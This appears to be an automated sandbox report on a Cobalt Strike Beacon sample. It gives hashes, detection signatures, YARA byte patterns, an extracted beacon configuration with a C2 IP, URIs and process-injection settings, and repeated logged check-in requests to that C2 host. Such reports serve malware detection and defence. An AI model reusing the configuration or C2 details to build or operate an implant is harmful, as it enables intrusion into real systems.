Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
beacon_x86.exe

Overview

General Information

Sample name:beacon_x86.exe
Analysis ID:1587368
MD5:bffe5dbe4d4ececc6652360ce37b8075
SHA1:9e3ccfe33a88fd70ba6b5ac8f72b3bc0c760e798
SHA256:c86426eeb24a042903b302c21513defb1e61535fc008b7c9e847113ddb798666
Tags:CobaltStrikeexeuser-lontze7
Infos:

Detection

CobaltStrike
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected CobaltStrike
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
Program does not show much activity (idle)
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • beacon_x86.exe (PID: 2952 cmdline: "C:\Users\user\Desktop\beacon_x86.exe" MD5: BFFE5DBE4D4ECECC6652360CE37B8075)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Cobalt Strike, CobaltStrikeCobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • Earth Baxia
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike
{"BeaconType": ["HTTP"], "Port": 80, "SleepTime": 15024, "MaxGetSize": 3341464, "Jitter": 45, "C2Server": "8.148.6.140,/api/v1/get", "HttpPostUri": "/api/v1/post", "Malleable_C2_Instructions": ["Base64 decode"], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%allusersprofile%\\CrashReport\\CrashReport.exe", "Spawnto_x64": "%allusersprofile%\\CrashReport\\CrashReport64.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 666666666, "bStageCleanup": "True", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "False", "bProcInject_UseRWX": "False", "bProcInject_MinAllocSize": 10192, "ProcInject_PrependAppend_x86": ["Dx+EAAAAAAAPHwAPH0QAAJAPH4QAAAAAAA==", "Dx9EAAAPH0QAAA8fAA8fgAAAAABmDx9EAABmDx+EAAAAAAAPH0AADx9AAA8fQAA="], "ProcInject_PrependAppend_x64": ["kA8fQAAPH4QAAAAAAGYPH0QAAA8fQAAPH4QAAAAAAJBmDx+EAAAAAAAPH0QAAJAPHwAPH4AAAAAADx9AAA8fQABQWGaQZg8fhAAAAAAAZg8fhAAAAAAADx8A", "Dx+AAAAAAA8fhAAAAAAADx9EAABmDx9EAACQDx9EAAAPH4AAAAAAUFgPH4AAAAAADx8ADx+AAAAAAA8fgAAAAAAPH0AADx8AZg8fRAAADx9EAAAPH4QAAAAAAA8fQACQkA=="], "ProcInject_Execute": ["ntdll:RtlUserThreadStart", "CreateThread", "NtQueueApcThread-s", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}
SourceRuleDescriptionAuthorStrings
beacon_x86.exeJoeSecurity_CobaltStrike_4Yara detected CobaltStrikeJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.3890591328.0000000000D97000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Metasploit_7bc0f998Identifies the API address lookup function leverage by metasploit shellcodeunknown
    • 0x8f:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
    00000000.00000002.3890591328.0000000000D97000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Metasploit_c9773203Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.unknown
    • 0xfb:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
    00000000.00000003.2049538044.0000000000D20000.00000020.00001000.00020000.00000000.sdmpWindows_Trojan_CobaltStrike_f0b627fcRule for beacon reflective loaderunknown
    • 0x9d60:$beacon_loader_x86_2: 81 E1 FF FF FF 00 81 F9 41 41 41 00 75 1D 8B 55 D8 81 E2 FF FF FF 00 81 FA 42 42 42 00 75
    • 0xaa30:$beacon_loader_x86_2: 81 E1 FF FF FF 00 81 F9 41 41 41 00 75 1D 8B 55 D8 81 E2 FF FF FF 00 81 FA 42 42 42 00 75
    00000000.00000003.2049538044.0000000000D20000.00000020.00001000.00020000.00000000.sdmpWindows_Trojan_Metasploit_7bc0f998Identifies the API address lookup function leverage by metasploit shellcodeunknown
    • 0x364cd:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
    00000000.00000003.2049538044.0000000000D20000.00000020.00001000.00020000.00000000.sdmpWindows_Trojan_Metasploit_c9773203Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.unknown
    • 0x36539:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
    Click to see the 1 entries
    SourceRuleDescriptionAuthorStrings
    0.2.beacon_x86.exe.400000.0.unpackJoeSecurity_CobaltStrike_4Yara detected CobaltStrikeJoe Security
      0.0.beacon_x86.exe.400000.0.unpackJoeSecurity_CobaltStrike_4Yara detected CobaltStrikeJoe Security
        No Sigma rule has matched
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: beacon_x86.exeAvira: detected
        Source: 00000000.00000003.2049538044.0000000000D20000.00000020.00001000.00020000.00000000.sdmpMalware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTP"], "Port": 80, "SleepTime": 15024, "MaxGetSize": 3341464, "Jitter": 45, "C2Server": "8.148.6.140,/api/v1/get", "HttpPostUri": "/api/v1/post", "Malleable_C2_Instructions": ["Base64 decode"], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%allusersprofile%\\CrashReport\\CrashReport.exe", "Spawnto_x64": "%allusersprofile%\\CrashReport\\CrashReport64.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 666666666, "bStageCleanup": "True", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "False", "bProcInject_UseRWX": "False", "bProcInject_MinAllocSize": 10192, "ProcInject_PrependAppend_x86": ["Dx+EAAAAAAAPHwAPH0QAAJAPH4QAAAAAAA==", "Dx9EAAAPH0QAAA8fAA8fgAAAAABmDx9EAABmDx+EAAAAAAAPH0AADx9AAA8fQAA="], "ProcInject_PrependAppend_x64": ["kA8fQAAPH4QAAAAAAGYPH0QAAA8fQAAPH4QAAAAAAJBmDx+EAAAAAAAPH0QAAJAPHwAPH4AAAAAADx9AAA8fQABQWGaQZg8fhAAAAAAAZg8fhAAAAAAADx8A", "Dx+AAAAAAA8fhAAAAAAADx9EAABmDx9EAACQDx9EAAAPH4AAAAAAUFgPH4AAAAAADx8ADx+AAAAAAA8fgAAAAAAPH0AADx8AZg8fRAAADx9EAAAPH4QAAAAAAA8fQACQkA=="], "ProcInject_Execute": ["ntdll:RtlUserThreadStart", "CreateThread", "NtQueueApcThread-s", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}
        Source: beacon_x86.exeVirustotal: Detection: 79%Perma Link
        Source: beacon_x86.exeReversingLabs: Detection: 94%
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Source: beacon_x86.exeJoe Sandbox ML: detected
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_2_00D6DF82 CryptGenRandom,CryptReleaseContext,0_2_00D6DF82
        Source: beacon_x86.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_2_00D64225 _malloc,_memset,_strncmp,GetCurrentDirectoryA,FindFirstFileA,GetLastError,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,0_2_00D64225
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_2_00D6970E _malloc,__snprintf,FindFirstFileA,_malloc,__snprintf,FindNextFileA,FindClose,0_2_00D6970E

        Networking

        barindex
        Source: Malware configuration extractorURLs: 8.148.6.140
        Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=gd3f9vAfNwTV60ENNBgjYsnEyQYTGVo96xMpZjhBpFuR7qjrTTQ9Y0QV3LkxS8ljwTHIU/cP4Ie0XKdPlpL3SPxZHyYZ7RFdNtIimS7gRzpKO+wsEVbyMbrod2jQyDlHWnoyNYamQ9g1MxzWesxfQZcX689JHO4ne6CdN2exZdU=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=gd3f9vAfNwTV60ENNBgjYsnEyQYTGVo96xMpZjhBpFuR7qjrTTQ9Y0QV3LkxS8ljwTHIU/cP4Ie0XKdPlpL3SPxZHyYZ7RFdNtIimS7gRzpKO+wsEVbyMbrod2jQyDlHWnoyNYamQ9g1MxzWesxfQZcX689JHO4ne6CdN2exZdU=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=gd3f9vAfNwTV60ENNBgjYsnEyQYTGVo96xMpZjhBpFuR7qjrTTQ9Y0QV3LkxS8ljwTHIU/cP4Ie0XKdPlpL3SPxZHyYZ7RFdNtIimS7gRzpKO+wsEVbyMbrod2jQyDlHWnoyNYamQ9g1MxzWesxfQZcX689JHO4ne6CdN2exZdU=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=gd3f9vAfNwTV60ENNBgjYsnEyQYTGVo96xMpZjhBpFuR7qjrTTQ9Y0QV3LkxS8ljwTHIU/cP4Ie0XKdPlpL3SPxZHyYZ7RFdNtIimS7gRzpKO+wsEVbyMbrod2jQyDlHWnoyNYamQ9g1MxzWesxfQZcX689JHO4ne6CdN2exZdU=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=gd3f9vAfNwTV60ENNBgjYsnEyQYTGVo96xMpZjhBpFuR7qjrTTQ9Y0QV3LkxS8ljwTHIU/cP4Ie0XKdPlpL3SPxZHyYZ7RFdNtIimS7gRzpKO+wsEVbyMbrod2jQyDlHWnoyNYamQ9g1MxzWesxfQZcX689JHO4ne6CdN2exZdU=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=gd3f9vAfNwTV60ENNBgjYsnEyQYTGVo96xMpZjhBpFuR7qjrTTQ9Y0QV3LkxS8ljwTHIU/cP4Ie0XKdPlpL3SPxZHyYZ7RFdNtIimS7gRzpKO+wsEVbyMbrod2jQyDlHWnoyNYamQ9g1MxzWesxfQZcX689JHO4ne6CdN2exZdU=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=gd3f9vAfNwTV60ENNBgjYsnEyQYTGVo96xMpZjhBpFuR7qjrTTQ9Y0QV3LkxS8ljwTHIU/cP4Ie0XKdPlpL3SPxZHyYZ7RFdNtIimS7gRzpKO+wsEVbyMbrod2jQyDlHWnoyNYamQ9g1MxzWesxfQZcX689JHO4ne6CdN2exZdU=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=gd3f9vAfNwTV60ENNBgjYsnEyQYTGVo96xMpZjhBpFuR7qjrTTQ9Y0QV3LkxS8ljwTHIU/cP4Ie0XKdPlpL3SPxZHyYZ7RFdNtIimS7gRzpKO+wsEVbyMbrod2jQyDlHWnoyNYamQ9g1MxzWesxfQZcX689JHO4ne6CdN2exZdU=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=gd3f9vAfNwTV60ENNBgjYsnEyQYTGVo96xMpZjhBpFuR7qjrTTQ9Y0QV3LkxS8ljwTHIU/cP4Ie0XKdPlpL3SPxZHyYZ7RFdNtIimS7gRzpKO+wsEVbyMbrod2jQyDlHWnoyNYamQ9g1MxzWesxfQZcX689JHO4ne6CdN2exZdU=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=gd3f9vAfNwTV60ENNBgjYsnEyQYTGVo96xMpZjhBpFuR7qjrTTQ9Y0QV3LkxS8ljwTHIU/cP4Ie0XKdPlpL3SPxZHyYZ7RFdNtIimS7gRzpKO+wsEVbyMbrod2jQyDlHWnoyNYamQ9g1MxzWesxfQZcX689JHO4ne6CdN2exZdU=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=gd3f9vAfNwTV60ENNBgjYsnEyQYTGVo96xMpZjhBpFuR7qjrTTQ9Y0QV3LkxS8ljwTHIU/cP4Ie0XKdPlpL3SPxZHyYZ7RFdNtIimS7gRzpKO+wsEVbyMbrod2jQyDlHWnoyNYamQ9g1MxzWesxfQZcX689JHO4ne6CdN2exZdU=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=gd3f9vAfNwTV60ENNBgjYsnEyQYTGVo96xMpZjhBpFuR7qjrTTQ9Y0QV3LkxS8ljwTHIU/cP4Ie0XKdPlpL3SPxZHyYZ7RFdNtIimS7gRzpKO+wsEVbyMbrod2jQyDlHWnoyNYamQ9g1MxzWesxfQZcX689JHO4ne6CdN2exZdU=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=gd3f9vAfNwTV60ENNBgjYsnEyQYTGVo96xMpZjhBpFuR7qjrTTQ9Y0QV3LkxS8ljwTHIU/cP4Ie0XKdPlpL3SPxZHyYZ7RFdNtIimS7gRzpKO+wsEVbyMbrod2jQyDlHWnoyNYamQ9g1MxzWesxfQZcX689JHO4ne6CdN2exZdU=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=gd3f9vAfNwTV60ENNBgjYsnEyQYTGVo96xMpZjhBpFuR7qjrTTQ9Y0QV3LkxS8ljwTHIU/cP4Ie0XKdPlpL3SPxZHyYZ7RFdNtIimS7gRzpKO+wsEVbyMbrod2jQyDlHWnoyNYamQ9g1MxzWesxfQZcX689JHO4ne6CdN2exZdU=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: unknownTCP traffic detected without corresponding DNS query: 8.148.6.140
        Source: unknownTCP traffic detected without corresponding DNS query: 8.148.6.140
        Source: unknownTCP traffic detected without corresponding DNS query: 8.148.6.140
        Source: unknownTCP traffic detected without corresponding DNS query: 8.148.6.140
        Source: unknownTCP traffic detected without corresponding DNS query: 8.148.6.140
        Source: unknownTCP traffic detected without corresponding DNS query: 8.148.6.140
        Source: unknownTCP traffic detected without corresponding DNS query: 8.148.6.140
        Source: unknownTCP traffic detected without corresponding DNS query: 8.148.6.140
        Source: unknownTCP traffic detected without corresponding DNS query: 8.148.6.140
        Source: unknownTCP traffic detected without corresponding DNS query: 8.148.6.140
        Source: unknownTCP traffic detected without corresponding DNS query: 8.148.6.140
        Source: unknownTCP traffic detected without corresponding DNS query: 8.148.6.140
        Source: unknownTCP traffic detected without corresponding DNS query: 8.148.6.140
        Source: unknownTCP traffic detected without corresponding DNS query: 8.148.6.140
        Source: unknownTCP traffic detected without corresponding DNS query: 8.148.6.140
        Source: unknownTCP traffic detected without corresponding DNS query: 8.148.6.140
        Source: unknownTCP traffic detected without corresponding DNS query: 8.148.6.140
        Source: unknownTCP traffic detected without corresponding DNS query: 8.148.6.140
        Source: unknownTCP traffic detected without corresponding DNS query: 8.148.6.140
        Source: unknownTCP traffic detected without corresponding DNS query: 8.148.6.140
        Source: unknownTCP traffic detected without corresponding DNS query: 8.148.6.140
        Source: unknownTCP traffic detected without corresponding DNS query: 8.148.6.140
        Source: unknownTCP traffic detected without corresponding DNS query: 8.148.6.140
        Source: unknownTCP traffic detected without corresponding DNS query: 8.148.6.140
        Source: unknownTCP traffic detected without corresponding DNS query: 8.148.6.140
        Source: unknownTCP traffic detected without corresponding DNS query: 8.148.6.140
        Source: unknownTCP traffic detected without corresponding DNS query: 8.148.6.140
        Source: unknownTCP traffic detected without corresponding DNS query: 8.148.6.140
        Source: unknownTCP traffic detected without corresponding DNS query: 8.148.6.140
        Source: unknownTCP traffic detected without corresponding DNS query: 8.148.6.140
        Source: unknownTCP traffic detected without corresponding DNS query: 8.148.6.140
        Source: unknownTCP traffic detected without corresponding DNS query: 8.148.6.140
        Source: unknownTCP traffic detected without corresponding DNS query: 8.148.6.140
        Source: unknownTCP traffic detected without corresponding DNS query: 8.148.6.140
        Source: unknownTCP traffic detected without corresponding DNS query: 8.148.6.140
        Source: unknownTCP traffic detected without corresponding DNS query: 8.148.6.140
        Source: unknownTCP traffic detected without corresponding DNS query: 8.148.6.140
        Source: unknownTCP traffic detected without corresponding DNS query: 8.148.6.140
        Source: unknownTCP traffic detected without corresponding DNS query: 8.148.6.140
        Source: unknownTCP traffic detected without corresponding DNS query: 8.148.6.140
        Source: unknownTCP traffic detected without corresponding DNS query: 8.148.6.140
        Source: unknownTCP traffic detected without corresponding DNS query: 8.148.6.140
        Source: unknownTCP traffic detected without corresponding DNS query: 8.148.6.140
        Source: unknownTCP traffic detected without corresponding DNS query: 8.148.6.140
        Source: unknownTCP traffic detected without corresponding DNS query: 8.148.6.140
        Source: unknownTCP traffic detected without corresponding DNS query: 8.148.6.140
        Source: unknownTCP traffic detected without corresponding DNS query: 8.148.6.140
        Source: unknownTCP traffic detected without corresponding DNS query: 8.148.6.140
        Source: unknownTCP traffic detected without corresponding DNS query: 8.148.6.140
        Source: unknownTCP traffic detected without corresponding DNS query: 8.148.6.140
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 0_2_00D61C3F _memset,__snprintf,__snprintf,__snprintf,HttpOpenRequestA,HttpSendRequestA,InternetCloseHandle,InternetQueryDataAvailable,InternetReadFile,InternetCloseHandle,InternetCloseHandle,0_2_00D61C3F
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=gd3f9vAfNwTV60ENNBgjYsnEyQYTGVo96xMpZjhBpFuR7qjrTTQ9Y0QV3LkxS8ljwTHIU/cP4Ie0XKdPlpL3SPxZHyYZ7RFdNtIimS7gRzpKO+wsEVbyMbrod2jQyDlHWnoyNYamQ9g1MxzWesxfQZcX689JHO4ne6CdN2exZdU=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=gd3f9vAfNwTV60ENNBgjYsnEyQYTGVo96xMpZjhBpFuR7qjrTTQ9Y0QV3LkxS8ljwTHIU/cP4Ie0XKdPlpL3SPxZHyYZ7RFdNtIimS7gRzpKO+wsEVbyMbrod2jQyDlHWnoyNYamQ9g1MxzWesxfQZcX689JHO4ne6CdN2exZdU=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=gd3f9vAfNwTV60ENNBgjYsnEyQYTGVo96xMpZjhBpFuR7qjrTTQ9Y0QV3LkxS8ljwTHIU/cP4Ie0XKdPlpL3SPxZHyYZ7RFdNtIimS7gRzpKO+wsEVbyMbrod2jQyDlHWnoyNYamQ9g1MxzWesxfQZcX689JHO4ne6CdN2exZdU=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=gd3f9vAfNwTV60ENNBgjYsnEyQYTGVo96xMpZjhBpFuR7qjrTTQ9Y0QV3LkxS8ljwTHIU/cP4Ie0XKdPlpL3SPxZHyYZ7RFdNtIimS7gRzpKO+wsEVbyMbrod2jQyDlHWnoyNYamQ9g1MxzWesxfQZcX689JHO4ne6CdN2exZdU=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=gd3f9vAfNwTV60ENNBgjYsnEyQYTGVo96xMpZjhBpFuR7qjrTTQ9Y0QV3LkxS8ljwTHIU/cP4Ie0XKdPlpL3SPxZHyYZ7RFdNtIimS7gRzpKO+wsEVbyMbrod2jQyDlHWnoyNYamQ9g1MxzWesxfQZcX689JHO4ne6CdN2exZdU=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
